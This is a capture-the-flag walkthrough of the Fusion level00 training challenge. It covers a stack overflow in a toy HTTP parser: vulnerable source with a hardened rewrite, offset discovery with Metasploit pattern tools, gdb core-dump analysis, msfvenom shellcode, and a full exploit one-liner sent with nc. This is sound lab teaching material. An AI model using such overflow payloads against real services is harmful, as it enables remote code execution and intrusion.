
Fusion level00

Published: 2020-07-20 10:56:34  Source: web  Views: 1802  Author: terrying  Category: Security technology

After a little over half a month I finished Protostar; after a few days' rest I am carrying on with Fusion.

********* Aside begins **********

Back in university I agonised over whether to go down the programmer's road, and in the end gave up because long stretches of high-intensity coding made me unwell. Still, I have to praise that feeling you get when a bug is finally fixed. Today, finishing a challenge gives me the same feeling~~~~

********* Aside ends **********

level00 source:

#include "../common/common.c"

int fix_path(char *path)
{
    char resolved[128];
    /* realpath() may write up to PATH_MAX bytes into the 128-byte resolved[],
       and strcpy() copies the result back into the caller's buffer unchecked. */
    if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
    strcpy(path, resolved);
    return 0; /* added: the original falls off the end of a non-void function */
}

char *parse_http_request()
{
    char buffer[1024];
    char *path;
    char *q;

    /* The level prints its own stack address as a hint. */
    printf("[debug] buffer is at 0x%08x :-)\n", buffer);

    /* read() does not NUL-terminate buffer; the string functions below rely on it anyway. */
    if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
    if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

    path = &buffer[4];
    q = strchr(path, ' ');
    if(! q) errx(0, "No protocol version specified");
    *q++ = 0;
    if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

    fix_path(path);
    printf("trying to access %s\n", path);
    return path; /* returns a pointer into this function's own stack frame */
}

int main(int argc, char **argv, char **envp)
{
    int fd;
    char *p;

    background_process(NAME, UID, GID);
    fd = serve_forever(PORT);
    set_io(fd);
    parse_http_request();
    return 0;
}
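For contrast with the source above, here is a hardened version of the two routines, added as an illustration (this is not the level's code or the Fusion project's fix). It assumes callers pass the size of their own storage; the function names `fix_path_safe` and `parse_get_path` are invented for this example.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Hardened fix_path (hypothetical name). `pathsz` is the size of the storage
 * behind `path`. Returns 0 on success, 1 on failure (unresolvable or too long).
 * The level00 version kept a 128-byte resolved[] although realpath() may write
 * up to PATH_MAX bytes, and copied the result back with an unchecked strcpy();
 * both copies are bounded here. */
int fix_path_safe(char *path, size_t pathsz)
{
    char resolved[PATH_MAX];
    if (realpath(path, resolved) == NULL) return 1;
    size_t n = strlen(resolved);
    if (n + 1 > pathsz) return 1;        /* refuse rather than overflow */
    memcpy(path, resolved, n + 1);
    return 0;
}

/* Bounded replacement for parse_http_request() (hypothetical name). It never
 * reads past `reqlen` (the original relied on a NUL that read() never wrote),
 * and it copies the path into caller-owned `out` instead of returning a pointer
 * into a stack frame that is gone once the function returns.
 * Returns 0 on success, 1 on any malformed or over-long request. */
int parse_get_path(const char *req, size_t reqlen, char *out, size_t outsz)
{
    if (reqlen < 4 || memcmp(req, "GET ", 4) != 0) return 1;
    const char *path = req + 4;
    const char *end = memchr(path, ' ', reqlen - 4);   /* bounded search */
    if (end == NULL) return 1;
    size_t plen = (size_t)(end - path);
    if (plen + 1 > outsz) return 1;                    /* path would not fit */
    size_t rest = reqlen - 4 - plen - 1;               /* bytes after the space */
    if (rest < 8 || memcmp(end + 1, "HTTP/1.1", 8) != 0) return 1;
    memcpy(out, path, plen);
    out[plen] = '\0';
    return fix_path_safe(out, outsz);
}
```

With these bounds the 139-byte path used later in the write-up is simply rejected instead of reaching the saved return address.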

The Fusion challenges are the advanced successor to Protostar and are harder, though level00 is still a warm-up. The challenge hint tells us it is a stack problem, and that the shellcode should be placed outside resolved.


Since it is a stack problem, let's send a longer string.

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

######################################################################

# To change where core files are written:                            #

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'   #

######################################################################

Inspect the core file with gdb:

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
[sudo] password for fusion:
[New LWP 2495]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0x65413665 in ?? ()
(gdb)

Using the pattern_offset.rb tool:

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665
139

So the bytes of the overflow that overwrite EIP sit at offset 139.

Next, place the shellcode in the input and use the core file to find where it lands.

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>.
[New LWP 2833]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadbeef in ?? ()
(gdb) x/200x 0xbf89b340
0xbf89b340:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b350:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b360:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b370:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b380:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b390:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x54544800
0xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x90909090
0xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b400:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b410:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b420:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b430:     0x90909090      0x90909090      0x61616190      0x61616161
0xbf89b440:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b450:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b460:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b470:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b480:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


From the dump, the string we wrote is stored starting at 0xbf89b3d5. As before, pad some 0x90 bytes in front of the shellcode. The payload format should therefore look like this:

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]

First, obtain a shellcode:

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
[sudo] password for fusion:
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
"\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
"\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
"\x53\x89\xe1\xcd\x80";


And so:

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
fusion@fusion:/tmp$ ll
total 912
drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./
drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../
-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639
-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392
-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571
-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870
-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166
-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470
-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121
-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609
-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755
-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093
-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/
